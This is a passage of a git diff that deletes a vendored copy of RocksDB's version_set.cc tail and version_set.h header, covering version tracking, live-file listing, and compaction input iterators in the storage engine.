-uint64_t VersionSet::ApproximateSize(Version* v, const FdWithKeyRange& f,
-                                     const Slice& key) {
-  // pre-condition
-  assert(v);
-
-  uint64_t result = 0;
-  if (v->cfd_->internal_comparator().Compare(f.largest_key, key) <= 0) {
-    // Entire file is before "key", so just add the file size
-    result = f.fd.GetFileSize();
-  } else if (v->cfd_->internal_comparator().Compare(f.smallest_key, key) > 0) {
-    // Entire file is after "key", so ignore
-    result = 0;
-  } else {
-    // "key" falls in the range for this table.  Add the
-    // approximate offset of "key" within the table.
-    TableReader* table_reader_ptr;
-    InternalIterator* iter = v->cfd_->table_cache()->NewIterator(
-        ReadOptions(), env_options_, v->cfd_->internal_comparator(), f.fd,
-        nullptr /* range_del_agg */, &table_reader_ptr);
-    if (table_reader_ptr != nullptr) {
-      result = table_reader_ptr->ApproximateOffsetOf(key);
-    }
-    delete iter;
-  }
-  return result;
-}
-
-void VersionSet::AddLiveFiles(std::vector<FileDescriptor>* live_list) {
-  // pre-calculate space requirement
-  int64_t total_files = 0;
-  for (auto cfd : *column_family_set_) {
-    if (!cfd->initialized()) {
-      continue;
-    }
-    Version* dummy_versions = cfd->dummy_versions();
-    for (Version* v = dummy_versions->next_; v != dummy_versions;
-         v = v->next_) {
-      const auto* vstorage = v->storage_info();
-      for (int level = 0; level < vstorage->num_levels(); level++) {
-        total_files += vstorage->LevelFiles(level).size();
-      }
-    }
-  }
-
-  // just one time extension to the right size
-  live_list->reserve(live_list->size() + static_cast<size_t>(total_files));
-
-  for (auto cfd : *column_family_set_) {
-    if (!cfd->initialized()) {
-      continue;
-    }
-    auto* current = cfd->current();
-    bool found_current = false;
-    Version* dummy_versions = cfd->dummy_versions();
-    for (Version* v = dummy_versions->next_; v != dummy_versions;
-         v = v->next_) {
-      v->AddLiveFiles(live_list);
-      if (v == current) {
-        found_current = true;
-      }
-    }
-    if (!found_current && current != nullptr) {
-      // Should never happen unless it is a bug.
-      assert(false);
-      current->AddLiveFiles(live_list);
-    }
-  }
-}
-
-InternalIterator* VersionSet::MakeInputIterator(
-    const Compaction* c, RangeDelAggregator* range_del_agg) {
-  auto cfd = c->column_family_data();
-  ReadOptions read_options;
-  read_options.verify_checksums = true;
-  read_options.fill_cache = false;
-  // Compaction iterators shouldn't be confined to a single prefix.
-  // Compactions use Seek() for
-  // (a) concurrent compactions,
-  // (b) CompactionFilter::Decision::kRemoveAndSkipUntil.
-  read_options.total_order_seek = true;
-
-  // Level-0 files have to be merged together.  For other levels,
-  // we will make a concatenating iterator per level.
-  // TODO(opt): use concatenating iterator for level-0 if there is no overlap
-  const size_t space = (c->level() == 0 ? c->input_levels(0)->num_files +
-                                              c->num_input_levels() - 1
-                                        : c->num_input_levels());
-  InternalIterator** list = new InternalIterator* [space];
-  size_t num = 0;
-  for (size_t which = 0; which < c->num_input_levels(); which++) {
-    if (c->input_levels(which)->num_files != 0) {
-      if (c->level(which) == 0) {
-        const LevelFilesBrief* flevel = c->input_levels(which);
-        for (size_t i = 0; i < flevel->num_files; i++) {
-          list[num++] = cfd->table_cache()->NewIterator(
-              read_options, env_options_compactions_,
-              cfd->internal_comparator(), flevel->files[i].fd, range_del_agg,
-              nullptr /* table_reader_ptr */,
-              nullptr /* no per level latency histogram */,
-              true /* for_compaction */, nullptr /* arena */,
-              false /* skip_filters */, (int)which /* level */);
-        }
-      } else {
-        // Create concatenating iterator for the files from this level
-        list[num++] = NewTwoLevelIterator(
-            new LevelFileIteratorState(
-                cfd->table_cache(), read_options, env_options_compactions_,
-                cfd->internal_comparator(),
-                nullptr /* no per level latency histogram */,
-                true /* for_compaction */, false /* prefix enabled */,
-                false /* skip_filters */, (int)which /* level */,
-                range_del_agg),
-            new LevelFileNumIterator(cfd->internal_comparator(),
-                                     c->input_levels(which),
-                                     false /* don't sample compaction */));
-      }
-    }
-  }
-  assert(num <= space);
-  InternalIterator* result =
-      NewMergingIterator(&c->column_family_data()->internal_comparator(), list,
-                         static_cast<int>(num));
-  delete[] list;
-  return result;
-}
-
-// verify that the files listed in this compaction are present
-// in the current version
-bool VersionSet::VerifyCompactionFileConsistency(Compaction* c) {
-#ifndef NDEBUG
-  Version* version = c->column_family_data()->current();
-  const VersionStorageInfo* vstorage = version->storage_info();
-  if (c->input_version() != version) {
-    ROCKS_LOG_INFO(
-        db_options_->info_log,
-        "[%s] compaction output being applied to a different base version from"
-        " input version",
-        c->column_family_data()->GetName().c_str());
-
-    if (vstorage->compaction_style_ == kCompactionStyleLevel &&
-        c->start_level() == 0 && c->num_input_levels() > 2U) {
-      // We are doing a L0->base_level compaction. The assumption is if
-      // base level is not L1, levels from L1 to base_level - 1 is empty.
-      // This is ensured by having one compaction from L0 going on at the
-      // same time in level-based compaction. So that during the time, no
-      // compaction/flush can put files to those levels.
-      for (int l = c->start_level() + 1; l < c->output_level(); l++) {
-        if (vstorage->NumLevelFiles(l) != 0) {
-          return false;
-        }
-      }
-    }
-  }
-
-  for (size_t input = 0; input < c->num_input_levels(); ++input) {
-    int level = c->level(input);
-    for (size_t i = 0; i < c->num_input_files(input); ++i) {
-      uint64_t number = c->input(input, i)->fd.GetNumber();
-      bool found = false;
-      for (size_t j = 0; j < vstorage->files_[level].size(); j++) {
-        FileMetaData* f = vstorage->files_[level][j];
-        if (f->fd.GetNumber() == number) {
-          found = true;
-          break;
-        }
-      }
-      if (!found) {
-        return false;  // input files non existent in current version
-      }
-    }
-  }
-#endif
-  return true;     // everything good
-}
-
-Status VersionSet::GetMetadataForFile(uint64_t number, int* filelevel,
-                                      FileMetaData** meta,
-                                      ColumnFamilyData** cfd) {
-  for (auto cfd_iter : *column_family_set_) {
-    if (!cfd_iter->initialized()) {
-      continue;
-    }
-    Version* version = cfd_iter->current();
-    const auto* vstorage = version->storage_info();
-    for (int level = 0; level < vstorage->num_levels(); level++) {
-      for (const auto& file : vstorage->LevelFiles(level)) {
-        if (file->fd.GetNumber() == number) {
-          *meta = file;
-          *filelevel = level;
-          *cfd = cfd_iter;
-          return Status::OK();
-        }
-      }
-    }
-  }
-  return Status::NotFound("File not present in any level");
-}
-
-void VersionSet::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
-  for (auto cfd : *column_family_set_) {
-    if (cfd->IsDropped() || !cfd->initialized()) {
-      continue;
-    }
-    for (int level = 0; level < cfd->NumberLevels(); level++) {
-      for (const auto& file :
-           cfd->current()->storage_info()->LevelFiles(level)) {
-        LiveFileMetaData filemetadata;
-        filemetadata.column_family_name = cfd->GetName();
-        uint32_t path_id = file->fd.GetPathId();
-        if (path_id < db_options_->db_paths.size()) {
-          filemetadata.db_path = db_options_->db_paths[path_id].path;
-        } else {
-          assert(!db_options_->db_paths.empty());
-          filemetadata.db_path = db_options_->db_paths.back().path;
-        }
-        filemetadata.name = MakeTableFileName("", file->fd.GetNumber());
-        filemetadata.level = level;
-        filemetadata.size = file->fd.GetFileSize();
-        filemetadata.smallestkey = file->smallest.user_key().ToString();
-        filemetadata.largestkey = file->largest.user_key().ToString();
-        filemetadata.smallest_seqno = file->smallest_seqno;
-        filemetadata.largest_seqno = file->largest_seqno;
-        metadata->push_back(filemetadata);
-      }
-    }
-  }
-}
-
-void VersionSet::GetObsoleteFiles(std::vector<FileMetaData*>* files,
-                                  std::vector<std::string>* manifest_filenames,
-                                  uint64_t min_pending_output) {
-  assert(manifest_filenames->empty());
-  obsolete_manifests_.swap(*manifest_filenames);
-  std::vector<FileMetaData*> pending_files;
-  for (auto f : obsolete_files_) {
-    if (f->fd.GetNumber() < min_pending_output) {
-      files->push_back(f);
-    } else {
-      pending_files.push_back(f);
-    }
-  }
-  obsolete_files_.swap(pending_files);
-}
-
-ColumnFamilyData* VersionSet::CreateColumnFamily(
-    const ColumnFamilyOptions& cf_options, VersionEdit* edit) {
-  assert(edit->is_column_family_add_);
-
-  Version* dummy_versions = new Version(nullptr, this);
-  // Ref() dummy version once so that later we can call Unref() to delete it
-  // by avoiding calling "delete" explicitly (~Version is private)
-  dummy_versions->Ref();
-  auto new_cfd = column_family_set_->CreateColumnFamily(
-      edit->column_family_name_, edit->column_family_, dummy_versions,
-      cf_options);
-
-  Version* v = new Version(new_cfd, this, current_version_number_++);
-
-  // Fill level target base information.
-  v->storage_info()->CalculateBaseBytes(*new_cfd->ioptions(),
-                                        *new_cfd->GetLatestMutableCFOptions());
-  AppendVersion(new_cfd, v);
-  // GetLatestMutableCFOptions() is safe here without mutex since the
-  // cfd is not available to client
-  new_cfd->CreateNewMemtable(*new_cfd->GetLatestMutableCFOptions(),
-                             LastSequence());
-  new_cfd->SetLogNumber(edit->log_number_);
-  return new_cfd;
-}
-
-uint64_t VersionSet::GetNumLiveVersions(Version* dummy_versions) {
-  uint64_t count = 0;
-  for (Version* v = dummy_versions->next_; v != dummy_versions; v = v->next_) {
-    count++;
-  }
-  return count;
-}
-
-uint64_t VersionSet::GetTotalSstFilesSize(Version* dummy_versions) {
-  std::unordered_set<uint64_t> unique_files;
-  uint64_t total_files_size = 0;
-  for (Version* v = dummy_versions->next_; v != dummy_versions; v = v->next_) {
-    VersionStorageInfo* storage_info = v->storage_info();
-    for (int level = 0; level < storage_info->num_levels_; level++) {
-      for (const auto& file_meta : storage_info->LevelFiles(level)) {
-        if (unique_files.find(file_meta->fd.packed_number_and_path_id) ==
-            unique_files.end()) {
-          unique_files.insert(file_meta->fd.packed_number_and_path_id);
-          total_files_size += file_meta->fd.GetFileSize();
-        }
-      }
-    }
-  }
-  return total_files_size;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_set.h b/thirdparty/rocksdb/db/version_set.h
deleted file mode 100644
index 5862dea..0000000
--- a/thirdparty/rocksdb/db/version_set.h
+++ /dev/null
@@ -1,863 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// The representation of a DBImpl consists of a set of Versions.  The
-// newest version is called "current".  Older versions may be kept
-// around to provide a consistent view to live iterators.
-//
-// Each Version keeps track of a set of Table files per level.  The
-// entire set of versions is maintained in a VersionSet.
-//
-// Version,VersionSet are thread-compatible, but require external
-// synchronization on all accesses.
-
-#pragma once
-#include <atomic>
-#include <deque>
-#include <limits>
-#include <map>
-#include <memory>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/compaction.h"
-#include "db/compaction_picker.h"
-#include "db/dbformat.h"
-#include "db/file_indexer.h"
-#include "db/log_reader.h"
-#include "db/range_del_aggregator.h"
-#include "db/table_cache.h"
-#include "db/version_builder.h"
-#include "db/version_edit.h"
-#include "db/write_controller.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-namespace log {
-class Writer;
-}
-
-class Compaction;
-class InternalIterator;
-class LogBuffer;
-class LookupKey;
-class MemTable;
-class Version;
-class VersionSet;
-class WriteBufferManager;
-class MergeContext;
-class ColumnFamilySet;
-class TableCache;
-class MergeIteratorBuilder;
-
-// Return the smallest index i such that file_level.files[i]->largest >= key.
-// Return file_level.num_files if there is no such file.
-// REQUIRES: "file_level.files" contains a sorted list of
-// non-overlapping files.
-extern int FindFile(const InternalKeyComparator& icmp,
-                    const LevelFilesBrief& file_level, const Slice& key);
-
-// Returns true iff some file in "files" overlaps the user key range
-// [*smallest,*largest].
-// smallest==nullptr represents a key smaller than all keys in the DB.
-// largest==nullptr represents a key largest than all keys in the DB.
-// REQUIRES: If disjoint_sorted_files, file_level.files[]
-// contains disjoint ranges in sorted order.
-extern bool SomeFileOverlapsRange(const InternalKeyComparator& icmp,
-                                  bool disjoint_sorted_files,
-                                  const LevelFilesBrief& file_level,
-                                  const Slice* smallest_user_key,
-                                  const Slice* largest_user_key);
-
-// Generate LevelFilesBrief from vector<FdWithKeyRange*>
-// Would copy smallest_key and largest_key data to sequential memory
-// arena: Arena used to allocate the memory
-extern void DoGenerateLevelFilesBrief(LevelFilesBrief* file_level,
-                                      const std::vector<FileMetaData*>& files,
-                                      Arena* arena);
-
-class VersionStorageInfo {
- public:
-  VersionStorageInfo(const InternalKeyComparator* internal_comparator,
-                     const Comparator* user_comparator, int num_levels,
-                     CompactionStyle compaction_style,
-                     VersionStorageInfo* src_vstorage,
-                     bool _force_consistency_checks);
-  ~VersionStorageInfo();
-
-  void Reserve(int level, size_t size) { files_[level].reserve(size); }
-
-  void AddFile(int level, FileMetaData* f, Logger* info_log = nullptr);
-
-  void SetFinalized();
-
-  // Update num_non_empty_levels_.
-  void UpdateNumNonEmptyLevels();
-
-  void GenerateFileIndexer() {
-    file_indexer_.UpdateIndex(&arena_, num_non_empty_levels_, files_);
-  }
-
-  // Update the accumulated stats from a file-meta.
-  void UpdateAccumulatedStats(FileMetaData* file_meta);
-
-  // Decrease the current stat form a to-be-delected file-meta
-  void RemoveCurrentStats(FileMetaData* file_meta);
-
-  void ComputeCompensatedSizes();
-
-  // Updates internal structures that keep track of compaction scores
-  // We use compaction scores to figure out which compaction to do next
-  // REQUIRES: db_mutex held!!
-  // TODO find a better way to pass compaction_options_fifo.
-  void ComputeCompactionScore(const ImmutableCFOptions& immutable_cf_options,
-                              const MutableCFOptions& mutable_cf_options);
-
-  // Estimate est_comp_needed_bytes_
-  void EstimateCompactionBytesNeeded(
-      const MutableCFOptions& mutable_cf_options);
-
-  // This computes files_marked_for_compaction_ and is called by
-  // ComputeCompactionScore()
-  void ComputeFilesMarkedForCompaction();
-
-  // Generate level_files_brief_ from files_
-  void GenerateLevelFilesBrief();
-  // Sort all files for this version based on their file size and
-  // record results in files_by_compaction_pri_. The largest files are listed
-  // first.
-  void UpdateFilesByCompactionPri(CompactionPri compaction_pri);
-
-  void GenerateLevel0NonOverlapping();
-  bool level0_non_overlapping() const {
-    return level0_non_overlapping_;
-  }
-
-  int MaxInputLevel() const;
-  int MaxOutputLevel(bool allow_ingest_behind) const;
-
-  // Return level number that has idx'th highest score
-  int CompactionScoreLevel(int idx) const { return compaction_level_[idx]; }
-
-  // Return idx'th highest score
-  double CompactionScore(int idx) const { return compaction_score_[idx]; }
-
-  void GetOverlappingInputs(
-      int level, const InternalKey* begin,  // nullptr means before all keys
-      const InternalKey* end,               // nullptr means after all keys
-      std::vector<FileMetaData*>* inputs,
-      int hint_index = -1,        // index of overlap file
-      int* file_index = nullptr,  // return index of overlap file
-      bool expand_range = true)   // if set, returns files which overlap the
-      const;                      // range and overlap each other. If false,
-                                  // then just files intersecting the range
-  void GetCleanInputsWithinInterval(
-      int level, const InternalKey* begin,  // nullptr means before all keys
-      const InternalKey* end,               // nullptr means after all keys
-      std::vector<FileMetaData*>* inputs,
-      int hint_index = -1,        // index of overlap file
-      int* file_index = nullptr)  // return index of overlap file
-      const;
-
-  void GetOverlappingInputsRangeBinarySearch(
-      int level,           // level > 0
-      const Slice& begin,  // nullptr means before all keys
-      const Slice& end,    // nullptr means after all keys
-      std::vector<FileMetaData*>* inputs,
-      int hint_index,                // index of overlap file
-      int* file_index,               // return index of overlap file
-      bool within_interval = false)  // if set, force the inputs within interval
-      const;
-
-  void ExtendFileRangeOverlappingInterval(
-      int level,
-      const Slice& begin,  // nullptr means before all keys
-      const Slice& end,    // nullptr means after all keys
-      unsigned int index,  // start extending from this index
-      int* startIndex,     // return the startIndex of input range
-      int* endIndex)       // return the endIndex of input range
-      const;
-
-  void ExtendFileRangeWithinInterval(
-      int level,
-      const Slice& begin,  // nullptr means before all keys
-      const Slice& end,    // nullptr means after all keys
-      unsigned int index,  // start extending from this index
-      int* startIndex,     // return the startIndex of input range
-      int* endIndex)       // return the endIndex of input range
-      const;
-
-  // Returns true iff some file in the specified level overlaps
-  // some part of [*smallest_user_key,*largest_user_key].
-  // smallest_user_key==NULL represents a key smaller than all keys in the DB.
-  // largest_user_key==NULL represents a key largest than all keys in the DB.
-  bool OverlapInLevel(int level, const Slice* smallest_user_key,
-                      const Slice* largest_user_key);
-
-  // Returns true iff the first or last file in inputs contains
-  // an overlapping user key to the file "just outside" of it (i.e.
-  // just after the last file, or just before the first file)
-  // REQUIRES: "*inputs" is a sorted list of non-overlapping files
-  bool HasOverlappingUserKey(const std::vector<FileMetaData*>* inputs,
-                             int level);
-
-  int num_levels() const { return num_levels_; }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  int num_non_empty_levels() const {
-    assert(finalized_);
-    return num_non_empty_levels_;
-  }
-
-  // REQUIRES: This version has been finalized.
-  // (CalculateBaseBytes() is called)
-  // This may or may not return number of level files. It is to keep backward
-  // compatible behavior in universal compaction.
-  int l0_delay_trigger_count() const { return l0_delay_trigger_count_; }
-
-  void set_l0_delay_trigger_count(int v) { l0_delay_trigger_count_ = v; }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  int NumLevelFiles(int level) const {
-    assert(finalized_);
-    return static_cast<int>(files_[level].size());
-  }
-
-  // Return the combined file size of all files at the specified level.
-  uint64_t NumLevelBytes(int level) const;
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  const std::vector<FileMetaData*>& LevelFiles(int level) const {
-    return files_[level];
-  }
-
-  const rocksdb::LevelFilesBrief& LevelFilesBrief(int level) const {
-    assert(level < static_cast<int>(level_files_brief_.size()));
-    return level_files_brief_[level];
-  }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  const std::vector<int>& FilesByCompactionPri(int level) const {
-    assert(finalized_);
-    return files_by_compaction_pri_[level];
-  }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  // REQUIRES: DB mutex held during access
-  const autovector<std::pair<int, FileMetaData*>>& FilesMarkedForCompaction()
-      const {
-    assert(finalized_);
-    return files_marked_for_compaction_;
-  }
-
-  int base_level() const { return base_level_; }
-
-  // REQUIRES: lock is held
-  // Set the index that is used to offset into files_by_compaction_pri_ to find
-  // the next compaction candidate file.
-  void SetNextCompactionIndex(int level, int index) {
-    next_file_to_compact_by_size_[level] = index;
-  }
-
-  // REQUIRES: lock is held
-  int NextCompactionIndex(int level) const {
-    return next_file_to_compact_by_size_[level];
-  }
-
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  const FileIndexer& file_indexer() const {
-    assert(finalized_);
-    return file_indexer_;
-  }
-
-  // Only the first few entries of files_by_compaction_pri_ are sorted.
-  // There is no need to sort all the files because it is likely
-  // that on a running system, we need to look at only the first
-  // few largest files because a new version is created every few
-  // seconds/minutes (because of concurrent compactions).
-  static const size_t kNumberFilesToSort = 50;
-
-  // Return a human-readable short (single-line) summary of the number
-  // of files per level.  Uses *scratch as backing store.
-  struct LevelSummaryStorage {
-    char buffer[1000];
-  };
-  struct FileSummaryStorage {
-    char buffer[3000];
-  };
-  const char* LevelSummary(LevelSummaryStorage* scratch) const;
-  // Return a human-readable short (single-line) summary of files
-  // in a specified level.  Uses *scratch as backing store.
-  const char* LevelFileSummary(FileSummaryStorage* scratch, int level) const;
-
-  // Return the maximum overlapping data (in bytes) at next level for any
-  // file at a level >= 1.
-  int64_t MaxNextLevelOverlappingBytes();
-
-  // Return a human readable string that describes this version's contents.
-  std::string DebugString(bool hex = false) const;
-
-  uint64_t GetAverageValueSize() const {
-    if (accumulated_num_non_deletions_ == 0) {
-      return 0;
-    }
-    assert(accumulated_raw_key_size_ + accumulated_raw_value_size_ > 0);
-    assert(accumulated_file_size_ > 0);
-    return accumulated_raw_value_size_ / accumulated_num_non_deletions_ *
-           accumulated_file_size_ /
-           (accumulated_raw_key_size_ + accumulated_raw_value_size_);
-  }
-
-  uint64_t GetEstimatedActiveKeys() const;
-
-  double GetEstimatedCompressionRatioAtLevel(int level) const;
-
-  // re-initializes the index that is used to offset into
-  // files_by_compaction_pri_
-  // to find the next compaction candidate file.
-  void ResetNextCompactionIndex(int level) {
-    next_file_to_compact_by_size_[level] = 0;
-  }
-
-  const InternalKeyComparator* InternalComparator() {
-    return internal_comparator_;
-  }
-
-  // Returns maximum total bytes of data on a given level.
-  uint64_t MaxBytesForLevel(int level) const;
-
-  // Must be called after any change to MutableCFOptions.
-  void CalculateBaseBytes(const ImmutableCFOptions& ioptions,
-                          const MutableCFOptions& options);
-
-  // Returns an estimate of the amount of live data in bytes.
-  uint64_t EstimateLiveDataSize() const;
-
-  uint64_t estimated_compaction_needed_bytes() const {
-    return estimated_compaction_needed_bytes_;
-  }
-
-  void TEST_set_estimated_compaction_needed_bytes(uint64_t v) {
-    estimated_compaction_needed_bytes_ = v;
-  }
-
-  bool force_consistency_checks() const { return force_consistency_checks_; }
-
- private:
-  const InternalKeyComparator* internal_comparator_;
-  const Comparator* user_comparator_;
-  int num_levels_;            // Number of levels
-  int num_non_empty_levels_;  // Number of levels. Any level larger than it
-                              // is guaranteed to be empty.
-  // Per-level max bytes
-  std::vector<uint64_t> level_max_bytes_;
-
-  // A short brief metadata of files per level
-  autovector<rocksdb::LevelFilesBrief> level_files_brief_;
-  FileIndexer file_indexer_;
-  Arena arena_;  // Used to allocate space for file_levels_
-
-  CompactionStyle compaction_style_;
-
-  // List of files per level, files in each level are arranged
-  // in increasing order of keys
-  std::vector<FileMetaData*>* files_;
-
-  // Level that L0 data should be compacted to. All levels < base_level_ should
-  // be empty. -1 if it is not level-compaction so it's not applicable.
-  int base_level_;
-
-  // A list for the same set of files that are stored in files_,
-  // but files in each level are now sorted based on file
-  // size. The file with the largest size is at the front.
-  // This vector stores the index of the file from files_.
-  std::vector<std::vector<int>> files_by_compaction_pri_;
-
-  // If true, means that files in L0 have keys with non overlapping ranges
-  bool level0_non_overlapping_;
-
-  // An index into files_by_compaction_pri_ that specifies the first
-  // file that is not yet compacted
-  std::vector<int> next_file_to_compact_by_size_;
-
-  // Only the first few entries of files_by_compaction_pri_ are sorted.
-  // There is no need to sort all the files because it is likely
-  // that on a running system, we need to look at only the first
-  // few largest files because a new version is created every few
-  // seconds/minutes (because of concurrent compactions).
-  static const size_t number_of_files_to_sort_ = 50;
-
-  // This vector contains list of files marked for compaction and also not
-  // currently being compacted. It is protected by DB mutex. It is calculated in
-  // ComputeCompactionScore()
-  autovector<std::pair<int, FileMetaData*>> files_marked_for_compaction_;
-
-  // Level that should be compacted next and its compaction score.
-  // Score < 1 means compaction is not strictly needed.  These fields
-  // are initialized by Finalize().
-  // The most critical level to be compacted is listed first
-  // These are used to pick the best compaction level
-  std::vector<double> compaction_score_;
-  std::vector<int> compaction_level_;
-  int l0_delay_trigger_count_ = 0;  // Count used to trigger slow down and stop
-                                    // for number of L0 files.
-
-  // the following are the sampled temporary stats.
-  // the current accumulated size of sampled files.
-  uint64_t accumulated_file_size_;
-  // the current accumulated size of all raw keys based on the sampled files.
-  uint64_t accumulated_raw_key_size_;
-  // the current accumulated size of all raw keys based on the sampled files.
-  uint64_t accumulated_raw_value_size_;
-  // total number of non-deletion entries
-  uint64_t accumulated_num_non_deletions_;
-  // total number of deletion entries
-  uint64_t accumulated_num_deletions_;
-  // current number of non_deletion entries
-  uint64_t current_num_non_deletions_;
-  // current number of delection entries
-  uint64_t current_num_deletions_;
-  // current number of file samples
-  uint64_t current_num_samples_;
-  // Estimated bytes needed to be compacted until all levels' size is down to
-  // target sizes.
-  uint64_t estimated_compaction_needed_bytes_;
-
-  bool finalized_;
-
-  // If set to true, we will run consistency checks even if RocksDB
-  // is compiled in release mode
-  bool force_consistency_checks_;
-
-  friend class Version;
-  friend class VersionSet;
-  // No copying allowed
-  VersionStorageInfo(const VersionStorageInfo&) = delete;
-  void operator=(const VersionStorageInfo&) = delete;
-};
-
-class Version {
- public:
-  // Append to *iters a sequence of iterators that will
-  // yield the contents of this Version when merged together.
-  // REQUIRES: This version has been saved (see VersionSet::SaveTo)
-  void AddIterators(const ReadOptions&, const EnvOptions& soptions,
-                    MergeIteratorBuilder* merger_iter_builder,
-                    RangeDelAggregator* range_del_agg);
-
-  void AddIteratorsForLevel(const ReadOptions&, const EnvOptions& soptions,
-                            MergeIteratorBuilder* merger_iter_builder,
-                            int level, RangeDelAggregator* range_del_agg);
-
-  void AddRangeDelIteratorsForLevel(
-      const ReadOptions& read_options, const EnvOptions& soptions, int level,
-      std::vector<InternalIterator*>* range_del_iters);
-
-  // Lookup the value for key.  If found, store it in *val and
-  // return OK.  Else return a non-OK status.
-  // Uses *operands to store merge_operator operations to apply later.
-  //
-  // If the ReadOptions.read_tier is set to do a read-only fetch, then
-  // *value_found will be set to false if it cannot be determined whether
-  // this value exists without doing IO.
-  //
-  // If the key is Deleted, *status will be set to NotFound and
-  //                        *key_exists will be set to true.
-  // If no key was found, *status will be set to NotFound and
-  //                      *key_exists will be set to false.
-  // If seq is non-null, *seq will be set to the sequence number found
-  // for the key if a key was found.
-  //
-  // REQUIRES: lock is not held
-  void Get(const ReadOptions&, const LookupKey& key, PinnableSlice* value,
-           Status* status, MergeContext* merge_context,
-           RangeDelAggregator* range_del_agg, bool* value_found = nullptr,
-           bool* key_exists = nullptr, SequenceNumber* seq = nullptr,
-           bool* is_blob = nullptr);
-
-  // Loads some stats information from files. Call without mutex held. It needs
-  // to be called before applying the version to the version set.
-  void PrepareApply(const MutableCFOptions& mutable_cf_options,
-                    bool update_stats);
-
-  // Reference count management (so Versions do not disappear out from
-  // under live iterators)
-  void Ref();
-  // Decrease reference count. Delete the object if no reference left
-  // and return true. Otherwise, return false.
-  bool Unref();
-
-  // Add all files listed in the current version to *live.
-  void AddLiveFiles(std::vector<FileDescriptor>* live);
-
-  // Return a human readable string that describes this version's contents.
-  std::string DebugString(bool hex = false, bool print_stats = false) const;
-
-  // Returns the version nuber of this version
-  uint64_t GetVersionNumber() const { return version_number_; }
-
-  // REQUIRES: lock is held
-  // On success, "tp" will contains the table properties of the file
-  // specified in "file_meta".  If the file name of "file_meta" is
-  // known ahread, passing it by a non-null "fname" can save a
-  // file-name conversion.
-  Status GetTableProperties(std::shared_ptr<const TableProperties>* tp,
-                            const FileMetaData* file_meta,
-                            const std::string* fname = nullptr) const;
-
-  // REQUIRES: lock is held
-  // On success, *props will be populated with all SSTables' table properties.
-  // The keys of `props` are the sst file name, the values of `props` are the
-  // tables' propertis, represented as shared_ptr.
-  Status GetPropertiesOfAllTables(TablePropertiesCollection* props);
-  Status GetPropertiesOfAllTables(TablePropertiesCollection* props, int level);
-  Status GetPropertiesOfTablesInRange(const Range* range, std::size_t n,
-                                      TablePropertiesCollection* props) const;
-
-  // REQUIRES: lock is held
-  // On success, "tp" will contains the aggregated table property amoug
-  // the table properties of all sst files in this version.
-  Status GetAggregatedTableProperties(
-      std::shared_ptr<const TableProperties>* tp, int level = -1);
-
-  uint64_t GetEstimatedActiveKeys() {
-    return storage_info_.GetEstimatedActiveKeys();
-  }
-
-  size_t GetMemoryUsageByTableReaders();
-
-  ColumnFamilyData* cfd() const { return cfd_; }
-
-  // Return the next Version in the linked list. Used for debug only
-  Version* TEST_Next() const {
-    return next_;
-  }
-
-  int TEST_refs() const { return refs_; }
-
-  VersionStorageInfo* storage_info() { return &storage_info_; }
-
-  VersionSet* version_set() { return vset_; }
-
-  void GetColumnFamilyMetaData(ColumnFamilyMetaData* cf_meta);
-
- private:
-  Env* env_;
-  friend class VersionSet;
-
-  const InternalKeyComparator* internal_comparator() const {
-    return storage_info_.internal_comparator_;
-  }
-  const Comparator* user_comparator() const {
-    return storage_info_.user_comparator_;
-  }
-
-  bool PrefixMayMatch(const ReadOptions& read_options,
-                      InternalIterator* level_iter,
-                      const Slice& internal_prefix) const;
-
-  // Returns true if the filter blocks in the specified level will not be
-  // checked during read operations. In certain cases (trivial move or preload),
-  // the filter block may already be cached, but we still do not access it such
-  // that it eventually expires from the cache.
-  bool IsFilterSkipped(int level, bool is_file_last_in_level = false);
-
-  // The helper function of UpdateAccumulatedStats, which may fill the missing
-  // fields of file_mata from its associated TableProperties.
-  // Returns true if it does initialize FileMetaData.
-  bool MaybeInitializeFileMetaData(FileMetaData* file_meta);
-
-  // Update the accumulated stats associated with the current version.
-  // This accumulated stats will be used in compaction.
-  void UpdateAccumulatedStats(bool update_stats);
-
-  // Sort all files for this version based on their file size and
-  // record results in files_by_compaction_pri_. The largest files are listed
-  // first.
-  void UpdateFilesByCompactionPri();
-
-  ColumnFamilyData* cfd_;  // ColumnFamilyData to which this Version belongs
-  Logger* info_log_;
-  Statistics* db_statistics_;
-  TableCache* table_cache_;
-  const MergeOperator* merge_operator_;
-
-  VersionStorageInfo storage_info_;
-  VersionSet* vset_;            // VersionSet to which this Version belongs
-  Version* next_;               // Next version in linked list
-  Version* prev_;               // Previous version in linked list
-  int refs_;                    // Number of live refs to this version
-
-  // A version number that uniquely represents this version. This is
-  // used for debugging and logging purposes only.
-  uint64_t version_number_;
-
-  Version(ColumnFamilyData* cfd, VersionSet* vset, uint64_t version_number = 0);
-
-  ~Version();
-
-  // No copying allowed
-  Version(const Version&);
-  void operator=(const Version&);
-};
-
-class VersionSet {
- public:
-  VersionSet(const std::string& dbname, const ImmutableDBOptions* db_options,
-             const EnvOptions& env_options, Cache* table_cache,
-             WriteBufferManager* write_buffer_manager,
-             WriteController* write_controller);
-  ~VersionSet();
-
-  // Apply *edit to the current version to form a new descriptor that
-  // is both saved to persistent state and installed as the new
-  // current version.  Will release *mu while actually writing to the file.
-  // column_family_options has to be set if edit is column family add
-  // REQUIRES: *mu is held on entry.
-  // REQUIRES: no other thread concurrently calls LogAndApply()
-  Status LogAndApply(
-      ColumnFamilyData* column_family_data,
